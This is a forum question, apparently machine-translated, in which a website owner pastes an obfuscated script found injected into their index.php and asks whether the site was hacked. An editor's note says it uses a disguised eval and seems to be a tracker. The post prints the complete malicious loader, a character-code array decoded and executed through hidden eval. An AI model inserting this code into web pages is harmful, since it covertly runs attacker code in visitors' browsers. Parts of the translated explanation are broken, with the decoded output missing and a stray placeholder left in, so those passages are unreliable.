<script>
try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";
f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92
,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29
,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,
95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,
105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,1
06,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103
,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48
,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,
37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1
,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];
v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-
i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s);
</script>
我不知道这个脚本做了什么,但昨天我在我的网页index.php
页面上发现了这个,这实际上是让网站无法显示。
是否有危险的事情,比如有人入侵我的网站或什么的?
如果有人对此有任何想法,请告诉我。
编辑:由Rob W添加(不原始海报):代码经过混淆。修复了语法错误(您的格式设置导致106被分解为1\n06
。然后,替换最终e(s)
,这是eval(s)
的{{1}}的快捷方式。最后,执行控制台中的代码,你会得到(我没有格式化任何东西,这是文字结果):
s
这个脚本似乎是某种跟踪器。由于same origin policy's restrictions,外部页面无法读取您网页的Cookie / etc。这并不能保证您的服务器是安全的,因为它已被泄露。